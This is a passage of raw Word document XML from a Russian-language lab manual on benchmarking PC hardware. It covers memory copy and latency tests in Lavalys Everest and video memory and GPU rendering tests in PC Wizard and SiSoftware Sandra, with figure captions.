          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2385750" cy="1368565"/>
            <wp:effectExtent l="1905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61" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2386032" cy="1368727"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 10 – Тест «запись в память»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 Тест «Копирование в памяти» при помощи </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lavalys</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Everest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестируется скорость пересылки данных из одних ячеек памяти в другие через кэш процессора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для выполнения теста в окне программы выберите тест «Копирование в памяти» и нажмите кнопку «Обновить» (рис. 11).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2450550" cy="1524399"/>
            <wp:effectExtent l="19050" t="0" r="6900" b="0"/>
            <wp:docPr id="5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62" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2452200" cy="1525425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 11 – Тест «копирование в память»</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 xml:space="preserve">2.4 Тест «Задержка памяти» при помощи </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lavalys</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Everest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задержка памяти — тестируется среднее время ожидания между запросом процессора на получение ячейки с информацией из памяти и временем, когда оперативная память сделает первую ячейку доступной для чтения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для выполнения теста в окне программы выберите тест «Задержка памяти» и нажмите кнопку «Обновить» (рис. 12).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2530600" cy="1531795"/>
            <wp:effectExtent l="19050" t="0" r="3050" b="0"/>
            <wp:docPr id="5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63" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2531381" cy="1532268"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 12 – Тест «задержка памяти»</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3 Тестирование графики</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.1Тестирование видеопамяти</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Тестирование видеопамяти при помощи </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wizard</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Этот тест определяет быстродействие видеопамяти, измеряется количество кадров (</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fps</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) в секунду, которое видеокарта выдает при построении изображения. Изображение создается следующим образом: создается первичная поверхность с текстурой разрешением 1024</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">768 (32 бита) и чистая вторичная. Через шину </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AGP</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> со скоростью 64/128 линий в секунду на вторичную поверхность копируется первая.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Запустите </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wizard</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Появится главное окно программы. Перейдите на вкладку «Тест» (рис. 13).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2359276" cy="1836000"/>
            <wp:effectExtent l="19050" t="0" r="2924" b="0"/>
            <wp:docPr id="5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64" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2359802" cy="1836410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок 13 – Главное окно программы </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wizard</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Далее выберите из представленных тестов «</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Video</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Benchmark</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">» </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Результат теста представлен значением частоты кадров (</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>). Полученные значения можно сравнить с эталонными результатами, путем нажатия на кнопку «</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Compare</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>results</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>» (рис. 14). После чего появится вкладка сравнения результатов теста (рис. 15).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1723350" cy="1551448"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="53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65" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1723354" cy="1551451"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="000469BD" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок 14 </w:t>
      </w:r>
      <w:r w:rsidR="005918E0" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Результат теста видео</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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2361610" cy="1641291"/>
            <wp:effectExtent l="19050" t="0" r="590" b="0"/>
            <wp:docPr id="5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66" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2361247" cy="1641039"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 15 – Вкладка сравнения результатов теста</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3.2 Тестирование быстродействия графического процессора</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.1 Тестирование при помощи </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SiSoftware</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sandra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тест графического процессора «рендеринг» —  измеряется количество кадров (</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fps</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>), которое видеокарта выда</w:t>
      </w:r>
      <w:r w:rsidR="00776B59" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>т в секунду при создании плоского изображения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Чтобы начать тестирование в окне программы выберите и запустите тест «Рендеринг», в появившемся окне выберите «Тип устройства Direct3D 9c» и нажмите кнопку «Обновить».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Результат представлен значением частоты кадров (</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>), находящемся в левом верхнем углу (рис. 16, 17).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
